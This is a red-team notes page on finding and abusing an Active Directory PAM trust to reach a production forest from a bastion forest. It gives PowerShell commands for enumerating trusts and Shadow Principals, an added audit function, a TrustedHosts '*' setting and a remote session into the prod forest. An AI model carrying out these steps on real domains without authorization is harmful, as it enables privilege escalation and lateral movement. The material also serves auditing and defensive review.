# pam-trust

* Usually enabled between a Bastion (Red Forest) and the prod/user forest.
* Allows high-privileged access to the prod forest from the bastion forest, without needing separate credentials in the prod forest.
  * Requires the creation of Shadow Principals in the bastion domain that are mapped (by SID) to DA or EA in the prod forest.

## Methodology

1. Enumerate trusts.
2. Enumerate PAM trusts (`ForestTransitive` is true and `SIDFilteringForestAware` is false).
3. Enumerate `Shadow Principals`.
4. Abuse the PAM trust.

## Powershell

> [!INFO] Remember to follow the Powershell methodology

## ADModule

<https://github.com/samratashok/ADModule>

```powershell
# Step 1: enumerate every trust of the current forest
Get-ADTrust -Filter *
# Foreign security principals present in the bastion forest (objects originating from other forests)
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local
```

**Enumerate if PAM trust exists**

```powershell
# Step 2: a PAM trust is forest-transitive with SID filtering disabled
$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}} -Session $bastiondc
```

**Check members of Shadow Principals**

```powershell
# Step 3: Shadow Principals live under the Configuration naming context of the bastion forest;
# msDS-ShadowPrincipalSid is the SID of the prod-forest group they map to
Invoke-Command -ScriptBlock {Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl} -Session $bastiondc
```
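The following function is an added audit example, not code from the original page or from ADModule; it ties methodology steps 1 to 3 together by running the enumeration above from the bastion DC and resolving each `msDS-ShadowPrincipalSid` against the prod forest, so a reviewer can see which prod group (DA/EA) every Shadow Principal maps to and how many bastion accounts sit in it. The function name, parameters and the host names in the usage comment are assumptions; it expects the ADModule cmdlets to be loaded and a session to the bastion DC to be possible.

```powershell
# Added audit example (hypothetical function, not part of the original page).
# Assumes ADModule (Get-ADTrust, Get-ADObject, Get-ADRootDSE) is loaded and
# that $BastionDC / $ProdDC are reachable; both names are placeholders.
function Get-PamTrustAudit {
    param(
        [Parameter(Mandatory)] [string] $BastionDC,   # e.g. bastion-dc.bastion.local (placeholder)
        [Parameter(Mandatory)] [string] $ProdDC       # e.g. dc.prod.local (placeholder)
    )

    $session = New-PSSession -ComputerName $BastionDC

    # Step 2: a PAM trust is forest-transitive and has SID filtering disabled
    $pamTrusts = Invoke-Command -Session $session -ScriptBlock {
        Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} |
            Select-Object Name, Direction, ForestTransitive, SIDFilteringQuarantined, SIDFilteringForestAware
    }

    # Step 3: Shadow Principals are msDS-ShadowPrincipal objects under the Configuration NC
    $shadow = Invoke-Command -Session $session -ScriptBlock {
        $base = "CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext
        Get-ADObject -SearchBase $base -Filter {objectClass -eq "msDS-ShadowPrincipal"} `
            -Properties member, 'msDS-ShadowPrincipalSid'
    }

    Remove-PSSession $session

    # Resolve each mapped SID in the prod forest so the report names the real
    # target group (for example Domain Admins or Enterprise Admins)
    $report = foreach ($sp in $shadow) {
        $sid = [string]$sp.'msDS-ShadowPrincipalSid'
        $target = try {
            (Get-ADObject -Server $ProdDC -Filter {objectSid -eq $sid}).DistinguishedName
        } catch {
            'unresolved'
        }
        [pscustomobject]@{
            ShadowPrincipal = $sp.Name
            MappedSid       = $sid
            ProdTarget      = $target
            MemberCount     = @($sp.member).Count
            Members         = ($sp.member -join '; ')
        }
    }

    [pscustomobject]@{
        PamTrusts        = $pamTrusts
        ShadowPrincipals = $report
    }
}

# Usage (placeholder host names):
# $audit = Get-PamTrustAudit -BastionDC 'bastion-dc.bastion.local' -ProdDC 'dc.prod.local'
# $audit.PamTrusts | Format-Table
# $audit.ShadowPrincipals | Format-Table ShadowPrincipal, ProdTarget, MemberCount
```

Two things worth checking in the output: a Shadow Principal whose `ProdTarget` resolves to DA or EA is a direct path from bastion to prod, so its `Members` list is the set of bastion accounts that need the same protection as prod domain admins; and a trust that shows `SIDFilteringQuarantined` false together with `ForestTransitive` true is the condition the methodology uses to identify a PAM trust.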

**Configure WSMan to allow PSRemoting via IP address**

```powershell
# Client-side setting: applies only on the machine you run it from. "*" trusts every host for non-Kerberos remoting.
Set-Item WSMan:\localhost\Client\TrustedHosts * -Force
```

**PSRemote into prod\_forest**

```powershell
Enter-PSSession <PROD_FOREST_IP_ADDRESS> -Authentication NegotiateWithImplicitCredential
```

> [!INFO] When PSRemoting to an IP address you must use NTLM authentication: Kerberos needs an SPN, and an IP address does not resolve to one, so Negotiate falls back to NTLM.
